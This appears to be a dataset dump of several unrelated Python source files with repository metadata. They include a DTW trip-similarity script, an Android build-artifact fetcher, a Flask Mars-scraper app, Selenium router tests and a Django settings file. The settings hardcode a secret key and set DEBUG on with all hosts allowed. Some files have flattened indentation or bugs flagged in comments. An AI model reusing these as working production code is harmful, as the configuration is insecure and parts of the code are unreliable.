    for driver, trips in grouped_by_driver:
        print('driver is ')
        print(driver)
        sims = similarity_trips(trips)
        out_file = h5py.File(matched_trips_path + 'data-{}.h5'.format(driver), 'w')
        out_file.create_dataset('dataset_{}'.format(driver), data=sims)
        out_file.close()
def similarity_trips(trips):
    """Build a 201x201 DTW-distance matrix over a driver's trips and convert
    it into a similarity matrix.

    NOTE(review): the `break` statements mean only trip 1 is ever compared
    (against trips up to number 200) -- this looks like work-in-progress /
    debugging code; confirm whether the full matrix was intended.
    """
    m = KnnDtw(n_neighbors = 1, max_warping_window=50, subsample_step=10)
    sim = np.zeros((201, 201))
    for trip_num, trip in trips.groupby(level = ['Trip']):
        print(trip_num)
        # Only trip number 1 is processed (see NOTE in the docstring)
        if int(trip_num) != 1: continue
        for other_trip_num, other_trip in trips.groupby(level = ['Trip']):
            # Compute only if this cell has not been filled (or is on the diagonal)
            if (int (trip_num) != int(other_trip_num)) or (sim[trip_num, other_trip_num] == 0):
                print(other_trip_num)
                # Normalize both trips: rotate by final-point heading, then flip
                trip1 = flip(rotate_trip(trip))
                trip2 = flip(rotate_trip(other_trip))
                # DTW with Euclidean point-to-point distance
                distance = m._dtw_distance(trip1.values,
                                           trip2.values,
                                           d = lambda x,y: np.linalg.norm(x-y))
                # Distance is symmetric; fill both entries
                sim[trip_num, other_trip_num] = distance
                sim[other_trip_num, trip_num] = distance
            if int(other_trip_num) == 200: break
        break
    print(np.min(sim))
    # Rescale: 1 - max(nonzero distances in row 1) / distance.
    # NOTE(review): unfilled (zero) cells divide by zero here, producing
    # inf/-inf with a runtime warning -- confirm this is acceptable.
    non_zero_mask = sim[1, :] != 0
    first_row = sim[1, :]
    non_zero = first_row[non_zero_mask]
    sim = 1 - (np.max(non_zero) / sim)
    print(sim)
    first_row = sim[1, :]
    # NOTE(review): under Python 3 this prints a zip object, not the pairs
    print(zip(np.arange(201), first_row))
    return sim
# Chunks (containing parts of the mega df)
chunk_path = "/scratch/vstrobel/chunks32_small/"  # input directory of HDF5 chunk files
matched_trips_path = "/scratch/vstrobel/matched_dtw/"  # output directory for per-driver results
# NOTE(review): evaluated at import time; this raises if chunk_path does not exist
chunks = sorted(listdir(chunk_path))
def main():
    """Launch one worker process per chunk file (currently only the first)."""
    processes = []
    print(chunks[:1])
    for index, chunk_name in enumerate(chunks[:1]):
        worker = mp.Process(target = do_job, args = (index, chunk_name, ))
        processes.append(worker)
        worker.start()
if __name__ == "__main__":
main()
| [
"vstrobel@cn89.science.ru.nl"
] | vstrobel@cn89.science.ru.nl |
e188217cf5dcdf7b3d1b7887be7a21f67e80e4ab | 544cfadc742536618168fc80a5bd81a35a5f2c99 | /tools/treble/fetcher/fetcher_lib.py | 0ec017318832788f675ab4ad2587b17824faa6f9 | [
"Apache-2.0"
] | permissive | ZYHGOD-1/Aosp11 | 0400619993b559bf4380db2da0addfa9cccd698d | 78a61ca023cbf1a0cecfef8b97df2b274ac3a988 | refs/heads/main | 2023-04-21T20:13:54.629813 | 2021-05-22T05:28:21 | 2021-05-22T05:28:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,512 | py | """Provides helper functions for fetching artifacts."""
import io
import os
import re
import sys
import sysconfig
import time
# This is a workaround to put '/usr/lib/python3.X' ahead of googleapiclient
# Using embedded_launcher won't work since py3-cmd doesn't contain _ssl module.
if sys.version_info.major == 3:
sys.path.insert(0, os.path.dirname(sysconfig.get_paths()['purelib']))
# pylint: disable=import-error,g-bad-import-order,g-import-not-at-top
import apiclient
from googleapiclient.discovery import build
from six.moves import http_client
import httplib2
from oauth2client.service_account import ServiceAccountCredentials
# OAuth2 scope granting access to the internal Android build API
_SCOPE_URL = 'https://www.googleapis.com/auth/androidbuild.internal'
# Default application-default-credentials location, relative to $HOME
_DEF_JSON_KEYFILE = '.config/gcloud/application_default_credentials.json'

# 20 MB default chunk size -- used in Buildbot
_DEFAULT_CHUNK_SIZE = 20 * 1024 * 1024

# HTTP errors -- used in Buildbot
_DEFAULT_MASKED_ERRORS = [404]  # statuses reported as "no result" (None)
_DEFAULT_RETRIED_ERRORS = [503]  # transient statuses that trigger a retry
_DEFAULT_RETRIES = 10
def _create_http_from_p12(robot_credentials_file, robot_username):
    """Creates a credentialed HTTP object for requests.

    Args:
      robot_credentials_file: The path to the robot credentials file.
      robot_username: A string containing the username of the robot account.

    Returns:
      An authorized httplib2.Http object.
    """
    try:
        credentials = ServiceAccountCredentials.from_p12_keyfile(
            service_account_email=robot_username,
            filename=robot_credentials_file,
            scopes=_SCOPE_URL)
    except AttributeError:
        # from_p12_keyfile requires crypto support in oauth2client
        raise ValueError('Machine lacks openssl or pycrypto support')
    return credentials.authorize(httplib2.Http())
def _simple_execute(http_request,
                    masked_errors=None,
                    retried_errors=None,
                    retry_delay_seconds=5,
                    max_tries=_DEFAULT_RETRIES):
    """Execute http request and return None on specified errors.

    Args:
      http_request: the apiclient provided http request
      masked_errors: list of errors to return None on
      retried_errors: list of errors to retry the request on
      retry_delay_seconds: how many seconds to sleep before retrying
      max_tries: maximum number of attempts to make request

    Returns:
      The result on success or None on masked errors.
    """
    if not masked_errors:
        masked_errors = _DEFAULT_MASKED_ERRORS
    if not retried_errors:
        retried_errors = _DEFAULT_RETRIED_ERRORS

    last_error = None
    for _ in range(max_tries):
        try:
            return http_request.execute()
        except http_client.errors.HttpError as e:
            # NOTE(review): six.moves.http_client (httplib) has no `errors`
            # attribute; this except clause looks like it was meant to catch
            # googleapiclient.errors.HttpError -- confirm against the client
            # library actually installed before changing.
            last_error = e
            if e.resp.status in masked_errors:
                # Masked statuses (e.g. 404) are reported as "no result"
                return None
            elif e.resp.status in retried_errors:
                # Transient status: back off and retry
                time.sleep(retry_delay_seconds)
            else:
                # Server Error is server error
                raise e

    # We've gone through the max_retries, raise the last error
    raise last_error  # pylint: disable=raising-bad-type
def create_client(http):
    """Creates an Android build api client from an authorized http object.

    Args:
      http: An authorized httplib2.Http object.

    Returns:
      An authorized android build api client.
    """
    client = build(serviceName='androidbuildinternal', version='v2beta1', http=http)
    return client
def create_client_from_json_keyfile(json_keyfile_name=None):
    """Creates an Android build api client from a json keyfile.

    Args:
      json_keyfile_name: The location of the keyfile; if None (or empty),
        the default location under $HOME is used.

    Returns:
      An authorized android build api client.
    """
    if not json_keyfile_name:
        json_keyfile_name = os.path.join(os.getenv('HOME'), _DEF_JSON_KEYFILE)

    credentials = ServiceAccountCredentials.from_json_keyfile_name(
        filename=json_keyfile_name, scopes=_SCOPE_URL)
    # authorize() patches the passed Http object in place and returns it
    http = credentials.authorize(httplib2.Http())
    return create_client(http)
def create_client_from_p12(robot_credentials_file, robot_username):
    """Creates an Android build api client from a config file.

    Args:
      robot_credentials_file: The path to the robot credentials file.
      robot_username: A string containing the username of the robot account.

    Returns:
      An authorized android build api client.
    """
    authorized_http = _create_http_from_p12(robot_credentials_file, robot_username)
    return create_client(authorized_http)
def fetch_artifact(client, build_id, target, resource_id, dest):
    """Fetches an artifact.

    Args:
      client: An authorized android build api client.
      build_id: AB build id
      target: the target name to download from
      resource_id: the resource id of the artifact
      dest: path to store the artifact
    """
    out_dir = os.path.dirname(dest)
    # dest may be a bare filename, in which case dirname() returns '' and
    # os.makedirs('') would raise -- only create a directory when there is one
    if out_dir and not os.path.exists(out_dir):
        os.makedirs(out_dir)

    dl_req = client.buildartifact().get_media(
        buildId=build_id,
        target=target,
        attemptId='latest',
        resourceId=resource_id)

    print('Fetching %s to %s...' % (resource_id, dest))
    # Download in _DEFAULT_CHUNK_SIZE pieces, reporting progress as we go
    with io.FileIO(dest, mode='wb') as fh:
        downloader = apiclient.http.MediaIoBaseDownload(
            fh, dl_req, chunksize=_DEFAULT_CHUNK_SIZE)
        done = False
        while not done:
            status, done = downloader.next_chunk(num_retries=_DEFAULT_RETRIES)
            print('Fetching...' + str(status.progress() * 100))
    print('Done Fetching %s to %s' % (resource_id, dest))
def get_build_list(client, **kwargs):
    """Get a list of builds from the android build api that matches parameters.

    Args:
      client: An authorized android build api client.
      **kwargs: keyworded arguments to pass to build api.

    Returns:
      Response from build api.
    """
    return _simple_execute(client.build().list(**kwargs))
def list_artifacts(client, regex, **kwargs):
    """List artifacts from the android build api that matches parameters.

    Args:
      client: An authorized android build api client.
      regex: Regular expression pattern to match artifact name.
      **kwargs: keyworded arguments to pass to buildartifact.list api.

    Returns:
      List of matching artifact names.
    """
    kwargs.setdefault('attemptId', 'latest')
    pattern = re.compile(regex)

    matching_artifacts = []
    # Walk every page of results, collecting names that match the pattern
    req = client.buildartifact().list(**kwargs)
    while req:
        result = _simple_execute(req)
        if result and 'artifacts' in result:
            matching_artifacts.extend(
                a['name'] for a in result['artifacts'] if pattern.match(a['name']))
        req = client.buildartifact().list_next(req, result)
    return matching_artifacts
def fetch_artifacts(client, out_dir, target, pattern, build_id):
    """Fetches target files artifacts matching patterns.

    Args:
      client: An authorized instance of an android build api client for making
        requests.
      out_dir: The directory to store the fetched artifacts to.
      target: The target name to download from.
      pattern: A regex pattern to match to artifacts filename.
      build_id: The Android Build id.
    """
    if not os.path.exists(out_dir):
        os.makedirs(out_dir)

    # Build a list of needed artifacts, then download each one
    artifact_names = list_artifacts(
        client=client,
        regex=pattern,
        buildId=build_id,
        target=target)

    for artifact_name in artifact_names:
        fetch_artifact(
            client=client,
            build_id=build_id,
            target=target,
            resource_id=artifact_name,
            dest=os.path.join(out_dir, artifact_name))
def get_latest_build_id(client, branch, target):
    """Get the latest build id.

    Args:
      client: An authorized instance of an android build api client for making
        requests.
      branch: The branch to download from
      target: The target name to download from.

    Returns:
      The build id.

    Raises:
      ValueError: if no successful submitted build is found.
    """
    response = get_build_list(
        client=client,
        branch=branch,
        target=target,
        maxResults=1,
        successful=True,
        buildType='submitted')
    if not response:
        raise ValueError('Unable to determine latest build ID!')
    return response['builds'][0]['buildId']
def fetch_latest_artifacts(client, out_dir, target, pattern, branch):
    """Fetches target files artifacts matching patterns from the latest build.

    Args:
      client: An authorized instance of an android build api client for making
        requests.
      out_dir: The directory to store the fetched artifacts to.
      target: The target name to download from.
      pattern: A regex pattern to match to artifacts filename
      branch: The branch to download from
    """
    latest_build_id = get_latest_build_id(
        client=client, branch=branch, target=target)
    fetch_artifacts(client, out_dir, target, pattern, latest_build_id)
| [
"rick_tan@qq.com"
] | rick_tan@qq.com |
78c6cf70c1e2edc91311af5f97961551cec1e653 | 6013df9a764d5c678192d28aa2378d283d40f849 | /busca-jogos/setup.py | c1687ca9cc58f39071a23348a057a2ff389bbb3a | [
"MIT"
] | permissive | IvanBrasilico/AI-NanoDegree | a3559c5062afd08bbb4db48ce24672af38e4af36 | 531e63d99ae906b5908e064e9b716ebe22e48c8f | refs/heads/master | 2021-05-09T18:16:17.509603 | 2019-03-12T17:32:53 | 2019-03-12T17:32:53 | 119,159,570 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,394 | py | from setuptools import find_packages, setup
setup(
    # Package identity and metadata
    name='busca',
    description='Busca Patio',
    version='0.0.1',
    url='https://github.com/IvanBrasilico/busca',
    license='GPL',
    author='Ivan Brasilico',
    author_email='brasilico.ivan@gmail.com',
    packages=find_packages(),
    # Runtime dependencies
    install_requires=[
        'jupyter',
        'numpy',
        'matplotlib',
        'scikit-learn'
    ],
    setup_requires=['pytest-runner'],
    tests_require=['pytest'],
    test_suite="tests",
    package_data={
    },
    extras_require={
        # Development-only tooling; install with `pip install -e .[dev]`
        'dev': [
            'alembic',
            'autopep8',
            'bandit',
            'coverage',
            'flake8',
            'flake8-quotes',
            'flake8-docstrings',
            'flake8-todo',
            'isort',
            'mypy',
            'pyannotate',
            'pylint',
            'pytest',
            'pytest-cov',
            'pytest-mock',
            'radon',
            'testfixtures',
            'tox'
        ],
    },
    classifiers=[
        'Development Status :: 2 - Pre-Alpha',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)',
        'Operating System :: POSIX',
        'Topic :: Software Development :: User Interfaces',
        'Topic :: Utilities',
        'Programming Language :: Python :: 3.6',
    ],
)
| [
"Iv@n1234"
] | Iv@n1234 |
330866240a79c36dc0cade8d6a8bc2b898625667 | 94743a85befdf16892cd28f771cd96373ddc995f | /LIA.py | dfd77d0bd450fac8e95aaee9249ff7463d90abbd | [] | no_license | doelling/Rosalind | caa0201d792bd2aa06d76d53916e75858a3ca67a | ddefdab630fa9712cb7a69b540c2c4921d34f5d9 | refs/heads/master | 2020-06-03T13:46:12.055127 | 2019-07-03T16:33:25 | 2019-07-03T16:33:25 | 191,591,438 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 378 | py | import math
def combo(n, k):
    """Return the binomial coefficient C(n, k) as a float."""
    numerator = math.factorial(n)
    denominator = math.factorial(k) * math.factorial(n - k)
    return float(numerator / denominator)
def main():
    """Read generations and a threshold from stdin, then print the probability
    that at least that many descendants in the final generation are Aa Bb
    (Rosalind LIA: each descendant is Aa Bb with probability 0.25)."""
    generations = int(input())
    at_least = int(input())
    descendants = 2 ** generations
    prob = 0
    # Sum the binomial tail P(X >= at_least) with X ~ Binomial(descendants, 0.25)
    for successes in range(at_least, descendants + 1):
        prob += float(combo(descendants, successes) * (0.25 ** successes) * (0.75 ** (descendants - successes)))
    print(prob)
main()
| [
"45838137+doelling@users.noreply.github.com"
] | 45838137+doelling@users.noreply.github.com |
15a60453aa5419b4fa377688c031c2632596a4f9 | 7ce479cac0a14d924159db9c784e3325b8f0bce7 | /schemaorgschemas/Thing/MedicalEntity/MedicalProcedure/__init__.py | cbefd8704afe1d477dfc83e65cb81ce50f18686e | [] | no_license | EvelineAndreea/AGRe | 1f0c27237eb047a60bbcfb8d73e3157035406409 | b952125896a82741f6617c259dd4060954583180 | refs/heads/master | 2020-04-08T16:08:11.517166 | 2018-11-28T07:15:56 | 2018-11-28T07:15:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,059 | py | # -*- coding: utf-8 -*-
from schemaorgschemas.Thing import potentialActionProp, nameProp, sameAsProp, imageProp, urlProp, mainEntityOfPageProp, additionalTypeProp, alternateNameProp, descriptionProp
from schemaorgschemas.Thing.MedicalEntity import codeProp, relevantSpecialtyProp, studyProp, guidelineProp, recognizingAuthorityProp, medicineSystemProp
from schemaorgschemas.djangoschema import SchemaObject, SchemaProperty, SchemaEnumProperty, SCHEMA_ORG
from django.conf import settings
class MedicalProcedureSchema(SchemaObject):
    """Schema Mixin for MedicalProcedure
    Usage: place after django model in class definition, schema will return the schema.org url for the object
    A process of care used in either a diagnostic, therapeutic, or palliative capacity that relies on invasive (surgical), non-invasive, or percutaneous techniques.
    """

    def __init__(self):
        # Identifier used to build the schema.org URL for this type
        self.schema = 'MedicalProcedure'

    class followupProp(SchemaProperty):
        """
        SchemaField for followup
        Usage: Include in SchemaObject SchemaFields as your_django_field = followupProp()
        schema.org description:Typical or recommended followup care after the procedure is performed.

        prop_schema returns just the property without url#
        format_as is used by app templatetags based upon schema.org datatype
        """
        _prop_schema = 'followup'
        _expected_schema = None
        _enum = False
        _format_as = "TextField"

    class preparationProp(SchemaProperty):
        """
        SchemaField for preparation
        Usage: Include in SchemaObject SchemaFields as your_django_field = preparationProp()
        schema.org description:Typical preparation that a patient must undergo before having the procedure performed.

        prop_schema returns just the property without url#
        format_as is used by app templatetags based upon schema.org datatype
        """
        _prop_schema = 'preparation'
        _expected_schema = None
        _enum = False
        _format_as = "TextField"

    class procedureTypeProp(SchemaProperty):
        """
        SchemaField for procedureType
        Usage: Include in SchemaObject SchemaFields as your_django_field = procedureTypeProp()
        schema.org description:The type of procedure, for example Surgical, Noninvasive, or Percutaneous.

        prop_schema returns just the property without url#
        format_as is used by app templatetags based upon schema.org datatype
        used to reference MedicalProcedureType"""
        _prop_schema = 'procedureType'
        _expected_schema = 'MedicalProcedureType'
        _enum = False
        _format_as = "ForeignKey"

    class howPerformedProp(SchemaProperty):
        """
        SchemaField for howPerformed
        Usage: Include in SchemaObject SchemaFields as your_django_field = howPerformedProp()
        schema.org description:How the procedure is performed.

        prop_schema returns just the property without url#
        format_as is used by app templatetags based upon schema.org datatype
        """
        _prop_schema = 'howPerformed'
        _expected_schema = None
        _enum = False
        _format_as = "TextField"
# schema.org version 2.0
| [
"mihai.nechita95@gmail.com"
] | mihai.nechita95@gmail.com |
222a8516170dbdfd60052c5217c8dbe791724e6b | a6df74bc7c139734bd9ce9f48d51e08fdc7d7efb | /article/migrations/0016_auto_20210412_1456.py | 34b4c21151d60a7d9f4aa95d47c0410f17c749cc | [] | no_license | Erlan1998/python_group_7_homework_68_Erlan_Kurbanaliev | 5a7f210e51f1998e5d52cdeb42538f2786af3f9f | fdc92be2c5187c78fecdc713f58e0e3e9fc62cb1 | refs/heads/master | 2023-05-03T17:01:59.066596 | 2021-05-26T13:28:41 | 2021-05-26T13:28:41 | 368,165,221 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 495 | py | # Generated by Django 3.1.6 on 2021-04-12 14:56
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated migration (Django 3.1.6): replaces the Meta options of
    the ``article`` model — Russian verbose names plus one custom
    permission."""
    # NOTE(review): confirm the permission codename below uses only ASCII
    # letters — if its leading 'с' is a Cyrillic character, any permission
    # check typed with a Latin 'c' elsewhere will silently never match.
    # The string is left byte-identical here: this migration may already be
    # applied, and editing applied migrations breaks migration history.
    dependencies = [
        ('article', '0015_auto_20210412_1444'),
    ]
    operations = [
        migrations.AlterModelOptions(
            name='article',
            options={'permissions': [('сan_have_piece_of_pizza', 'Может съесть кусочек пиццы')], 'verbose_name': 'Статья', 'verbose_name_plural': 'Статьи'},
        ),
    ]
| [
"kurbanalieverlan@gmail.com"
] | kurbanalieverlan@gmail.com |
a28620373059999056f5a6645c8aa4c8770c27d6 | 017f71ae002c10542dbd534a2b4645e247d4b2cb | /caicolanches/pedidoCli/apps.py | 0a75d3fb97e553852323d1494b306c158476b22a | [
"Apache-2.0"
] | permissive | GeraldoMedeiros/Caico_Lanches | fdbdb084824698a45af878009beeab6e233b69f0 | a853d6884a09d7c879974f4549dd7316ea7991df | refs/heads/master | 2021-07-20T08:13:39.317248 | 2020-10-24T18:37:35 | 2020-10-24T18:37:35 | 216,081,219 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 93 | py | from django.apps import AppConfig
class PedidocliConfig(AppConfig):
    """Django application configuration for the ``pedidoCli`` app."""
    name = 'pedidoCli'
| [
"geraldo_sjs@hotmail.com"
] | geraldo_sjs@hotmail.com |
356241816157a0fc2f851715088c5e233b1bf34c | 5ca8e1f1513c17f08a4b6334b6cf130a2b213530 | /Linear Regression/simple_linear_regression.py | dcb69ac17ad5fa7fd2bc538eea8a1a96251b8509 | [] | no_license | justbydev/machine-learning | 3c86e92616aa5c2587478371a797932e95cefe2b | 9fab86632081b9ca0ff95a03b19e811153db2d15 | refs/heads/master | 2023-06-07T06:11:38.155833 | 2021-06-25T01:47:40 | 2021-06-25T01:47:40 | 299,304,026 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,686 | py | # -*- coding: utf-8 -*-
"""simple_linear_regression.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1LXUY6xbN50a5uA4LjulRdwWaSP2TZ0--
Import modules
"""
import numpy as np
import matplotlib.pyplot as plt
"""Setting Data"""
data = np.array([[100, 20], #출처:우아한 형제들 기술 블로그, [배달거리, 배달시간]
[150, 24],
[300, 36],
[400, 47],
[130, 22],
[240, 32],
[350, 47],
[200, 42],
[100, 21],
[110, 21],
[190, 30],
[120, 25],
[130, 18],
[270, 38],
[255, 28]])
x=data[:, 0].reshape((data.shape[0], 1))
y=data[:, 1].reshape((data.shape[0], 1))
fig, ax=plt.subplots()
for i in range(data.shape[0]):
ax.plot(x[i][0], y[i][0], marker='o', color='blue')
"""Setting Hyperparameter"""
learning_rate=0.00001
epoch=300000
weight=np.random.rand()
bias=np.random.randint(5, 20)
print(weight, bias)
"""Make Cost function(MSE)"""
def error_function(W, b):
    """Mean squared error of the linear model ``x*W + b`` against the
    module-level training targets ``y`` (x and y are globals defined above)."""
    residuals = x * W + b - y
    return np.sum(residuals ** 2) / len(y)
"""Predict"""
def predict():
    """Predicted y values for the module-level inputs ``x`` using the
    current global ``weight`` and ``bias``."""
    return bias + weight * x
"""Derivative of Error(using numerical derivative)"""
def numerical_derivative(f, W, b):
    """Central-difference gradient of ``f(W, b)`` with respect to W and b.

    Returns a (1, 2) float array: ``[[df/dW, df/db]]``.
    """
    step = 1e-4
    # Perturb each parameter symmetrically and take the central difference.
    dW = (f(float(W) + step, b) - f(float(W) - step, b)) / (2 * step)
    db = (f(W, float(b) + step) - f(W, float(b) - step)) / (2 * step)
    return np.array([[dW, db]])
"""Training"""
# Training: plain gradient descent on (weight, bias) using numerically
# estimated gradients of the MSE error function.
for i in range(epoch):
    grad=numerical_derivative(error_function, weight, bias)
    # Step both parameters against their gradient components.
    weight=weight-learning_rate*grad[0, 0]
    bias=bias-learning_rate*grad[0, 1]
    # Log progress every 15000 iterations.
    if i%15000==0:
        print('Epoch=', i, ' error_value=', error_function(weight, bias), "W=", weight, "b=", bias)
| [
"noreply@github.com"
] | justbydev.noreply@github.com |
3f6f9421f822fd2a774361edb18fd8c12c87027d | b58b175263f275e15a1b56bf1b0914db0f35ffc8 | /testcase/testcase_lan.py | 8d4326cbd823f38fc4d2cbf52a1cb50582dc55ed | [] | no_license | zeewii/BHU | aa9ff900a4bb6adb368081509b9f9222479f7742 | 1f3c4f634b44845f7a4f84535ff4904de4efc634 | refs/heads/master | 2021-01-09T21:49:01.534541 | 2015-09-30T09:21:28 | 2015-09-30T09:21:28 | 43,213,971 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,828 | py | #coding=utf-8
#描述:该模块为测试lan模块
#作者:曾祥卫
import unittest
from selenium import webdriver
import time,os,commands
from selenium.webdriver.common.action_chains import ActionChains
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import NoAlertPresentException
from login import login_control
from data import data
from network.interface import interface_control
from connect import ssh
from publicControl import public_control
from network.interface.lan import lan_business
from network.interface import interface_business
class TestLan(unittest.TestCase):
    """Selenium (Python 2) test cases for the router's LAN configuration
    page; the actual page interactions live in ``lan_business``."""
    def setUp(self):
        self.driver = webdriver.Firefox()
        # Maximize the browser window
        self.driver.maximize_window()
        # Log into the LAN page using the device's default IP
        lan_business.goin_default_lan(self)
    def test_054_055_IP_netmask(self):
        u"""Modify the LAN IP together with class A, B and C subnet masks"""
        # Collect the client's ping results against the modified IP after
        # each of the 4 LAN IP / netmask changes.
        result = lan_business.step_100msh0054_100msh0055(self)
        print result
        # Pass only if all 4 ping results are 0, otherwise fail.
        assert result == [0,0,0,0],u"测试LAN IP和A,B,C类子网掩码失败"
        print u"测试LAN IP和A,B,C类子网掩码成功"
    def test_056_custom_netmask(self):
        u"""LAN custom netmask configuration"""
        result = lan_business.step_100msh0056(self)
        print result
        # Pass only if all 4 results are 1, otherwise fail.
        assert result == [1,1,1,1],u"测试lan自定义掩码设置失败"
        print u"测试lan自定义掩码设置成功"
    def test_057_broadcast(self):
        u"""LAN broadcast address configuration validity test"""
        result = lan_business.step_100msh0057(self)
        print result
        # Pass only if both results are 1, otherwise fail.
        assert result == [1,1],u"测试lan广播地址配置有效性失败"
        print u"测试lan广播地址配置有效性成功"
    def test_059_startip(self):
        u"""Check the default start value of the DHCP IP address pool"""
        result = lan_business.step_100msh0059(self)
        print result
        # Pass only if the pool's default start value is 100.
        assert result == '100',u"测试IP地址池默认起始值失败"
        print u"测试IP地址池默认起始值成功"
    def test_067_068_abnormal_input(self):
        u"""LAN abnormal (invalid) input test"""
        result = lan_business.step_100msh0067_100msh0068(self)
        print result
        # Pass only if all 4 results are 1, otherwise fail.
        assert result == [1,1,1,1],u"测试lan异常输入测试失败"
        print u"lan测试异常输入测试成功"
    # Cleanup on exit
    def tearDown(self):
        self.driver.quit()
if __name__=='__main__':
unittest.main()
__author__ = 'zeng'
| [
"zeewii@sina.com"
] | zeewii@sina.com |
def score(text):
    """Total letter-grade score of *text*: 'A' = 4, 'B' = 3, 'C' = 2 and any
    other character (including 'D') = 1.

    Rewritten from a nested-ternary ``map``/``lambda`` to a dict lookup —
    same scoring, far easier to extend with new grades.
    """
    grade_points = {'A': 4, 'B': 3, 'C': 2}
    return sum(grade_points.get(letter, 1) for letter in text)
print(score('ADCBBBBCABBCBDACBDCAACDDDCAABABDBCBCBDBDBDDABBAAAAAAADADBDBCBDABADCADC')) | [
"leavingwill@gmail.com"
] | leavingwill@gmail.com |
9c61a034388f415eedc4cc4f25c3125988bd75c3 | 4f746d3986e31e969a080741ec9e678be12aa6aa | /07-iteraties/het grootste en het gemiddelde.py | b6fb82cbdf3b7b93fca654bc94d8abb14a7c12e1 | [] | no_license | BramCoucke/5WWIPython | cfac8da964419cd491f9d95a78118f76dfdd3eba | 6b3c1e98fabd17d13c407b93e0c9835f3ccfe250 | refs/heads/master | 2020-07-21T05:14:40.365292 | 2020-03-06T10:51:14 | 2020-03-06T10:51:14 | 206,760,388 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 377 | py | #invoer
aantal_getallen = int(input('aantal getallen: '))
getal1 = int(input('geefgetal: '))
maximum = getal1
som = getal1
for getal in range(0, aantal_getallen - 1):
getal = int(input('geef getal: '))
som = som + getal
maximum = max(maximum, getal)
gem = som/aantal_getallen
print('Het grootste getal is',maximum,'en het gemiddelde is {:.2f}'.format(gem))
| [
"bram.coucke1@sgsintpaulus.eu"
] | bram.coucke1@sgsintpaulus.eu |
284a991df8a2c106f0b4d374a3b50f95312a9c67 | bdd0ea0108d80fe8e663ac752968d51eace9043b | /app.py | 547f26c41092b580ef8d53777db5d6e769086715 | [] | no_license | Vphiladaeng/Web_Scraping_Challenge | b2cad828d9b825f24d6fac3c5e08160025000707 | 2dd336e26d0566606ec72c262907f147cd568316 | refs/heads/master | 2022-11-12T01:55:05.440366 | 2020-07-01T05:40:00 | 2020-07-01T05:40:00 | 272,603,316 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,173 | py | # Import Dependencies
from flask import Flask, render_template, redirect
from flask_pymongo import PyMongo
import scrape_mars
import os
# Hidden authetication file
#import config
# Create an instance of Flask app
app = Flask(__name__)
# Use flask_pymongo to set up mongo connection locally
app.config["MONGO_URI"] = "mongodb://localhost:27017/mars_app"
mongo = PyMongo(app)
# Create route that renders index.html template and finds documents from mongo
@app.route("/")
def home():
    # Fetch one document from the mars_info collection (written by /scrape;
    # find_one returns None until a scrape has run).
    mars_info = mongo.db.mars_info.find_one()
    # Render the index page with that document.
    return render_template("index.html", mars_info=mars_info)
# Route that will trigger scrape function
@app.route("/scrape")
def scrape():
    """Run all scrape_mars scrapers, upsert the combined result into the
    ``mars_info`` collection, and redirect back to the index page.

    Bug fix: the original body rebound ``mars_data`` with each scraper call,
    so only the hemispheres result was ever stored while the news, image,
    facts and weather results were computed and discarded.  All results are
    now merged into a single document.
    """
    mars_info = mongo.db.mars_info
    # NOTE(review): assumes each scrape_mars.* helper returns a dict of
    # fields for the mars_info document -- confirm against scrape_mars.py.
    mars_data = {}
    mars_data.update(scrape_mars.scrape_mars_news())
    mars_data.update(scrape_mars.scrape_mars_image())
    mars_data.update(scrape_mars.scrape_mars_facts())
    mars_data.update(scrape_mars.scrape_mars_weather())
    mars_data.update(scrape_mars.scrape_mars_hemispheres())
    mars_info.update({}, mars_data, upsert=True)
    return redirect("/", code=302)
if __name__ == "__main__":
app.run(debug= True) | [
"58916900+Vphiladaeng@users.noreply.github.com"
] | 58916900+Vphiladaeng@users.noreply.github.com |
7646235fc23a659c348f282fe46ba57f17a37f31 | 06cb58b807f0e44fde3b17f6241c0f9aea8c970a | /djangoproject/settings.py | c9f84bd5f1f881ef94ad5f1745028bd8114c90d9 | [] | no_license | hulumei123/Django-OpenCV | 3d0b908b4fb5d4852b69bad15ab0c681bca8f2ae | b8395e346725526d6cb6d76216a2eca8a7e5db55 | refs/heads/master | 2020-04-08T15:12:25.111752 | 2018-11-28T11:13:20 | 2018-11-28T11:13:20 | 159,469,912 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,448 | py | # -*- coding: utf-8 -*-
"""
Django settings for djangoproject project.
Generated by 'django-admin startproject' using Django 1.11.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'h3cd^cftn%zvld8s5(jkzw=r=4qwuif&=@c!thx%+*_3y0k$+d'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*', ]
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'img_db',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'djangoproject.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
